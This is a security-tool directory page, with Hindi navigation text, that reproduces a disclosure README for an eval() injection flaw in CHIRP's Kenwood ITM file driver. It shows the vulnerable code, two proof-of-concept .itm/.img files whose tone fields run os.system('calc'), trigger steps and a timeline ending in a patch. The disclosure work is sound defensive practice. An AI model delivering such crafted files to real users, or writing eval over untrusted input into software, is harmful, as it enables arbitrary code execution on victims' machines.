Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/cduram/chirp-codeexecution_via_malicious_imagefile
Vulnerability AnalysisExploitationPayload Development
GitHubcduram/chirp-codeexecution_via_malicious_imagefile

CHIRP-CodeExecution_via_Malicious_ImageFile

Proof-of-concept exploit for arbitrary code execution through eval() injection in a ham radio programming application, including malicious .itm/.img file payloads and root-cause analysis.

रिपॉजिटरी देखें
7014 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
अनुरोधित भाषा में सामग्री उपलब्ध नहीं है। अंग्रेज़ी संस्करण दिखाया जा रहा है।

CHIRP — Arbitrary Code Execution via eval() in Kenwood ITM Driver

Product: CHIRP - An open-source project for programming Ham Radios.
Affected Versions: URL: https://github.com/kk7ds/chirp, https://chirpmyradio.com
Affected Versions: <= chirp-next-20260814
CWE: CWE-95 (Eval Injection)


Overview

CHIRP's Kenwood ITM file format driver passes raw CSV field values from an opened file directly to Python's built-in eval() with no validation. An attacker who delivers a crafted file to a CHIRP user achieves arbitrary code execution as the victim user.

Root Cause

chirp/drivers/kenwood_itm.py, , lines 66–67:

_clean_tmode()
root@kitploit:~
def _clean_tmode(self, headers, line, mem):
    rtone = eval(generic_csv.get_datum_by_header(headers, line, "TXSIG"))  # SINK
    ctone = eval(generic_csv.get_datum_by_header(headers, line, "RXSIG"))  # SINK

The TXSIG and RXSIG values come directly from a CSV row in the opened file. No type check, allowlist, or sandboxing is applied before eval().

POCs

Below are two POCs.

Malicious .itm

root@kitploit:~
// Malicious .itm POC
CH,ZN,RXF,TXF,NAME,TXSIG,RXSIG
1,1,146.520000,146.520000,PoC,__import__('os').system('calc'),0

Malicious .img

root@kitploit:~
// Malicious .img POC
CH,ZN,RXF,TXF,NAME,TXSIG,RXSIG
1,0,146520000,146520000,PoC,__import__('os').system('calc.exe'),0

 chirpεimgeyJyY2xhc3MiOiAiSVRNUmFkaW8iLCAidmVuZG9yIjogIktlbndvb2QiLCAibW9kZWwiOiAiSVRNIiwgInZhcmlhbnQiOiAiIiwgImNoaXJwX3ZlcnNpb24iOiAiZGFpbHktMjAyMzAxMDEifQ==

Triggering in CHIRP

  1. Launch CHIRP.
  2. File → Open.
  3. Select {file_name}.img. If using the .itm payload, change the filter dropdown to "All Files" (ITM is not filtered for in CHIRP).
  4. Select {file_name}.itm.

Disclosure

2026-8-17 -- Vulnerability discovered
2026-8-17 -- E-mailed maintainer
2026-8-17 -- Maintainer responded and code fixed the same day. https://github.com/kk7ds/chirp/commit/39178dbfc4fece083ab9ed20286d6ae3a91a718e
2026-8-21 -- Installer release 20260821 includes the fix.
2026-8-22 -- NotCVE-2026-0013 issued.
2026-8-23 -- CVE-2026-78136 issued.

टूल डाउनलोड करें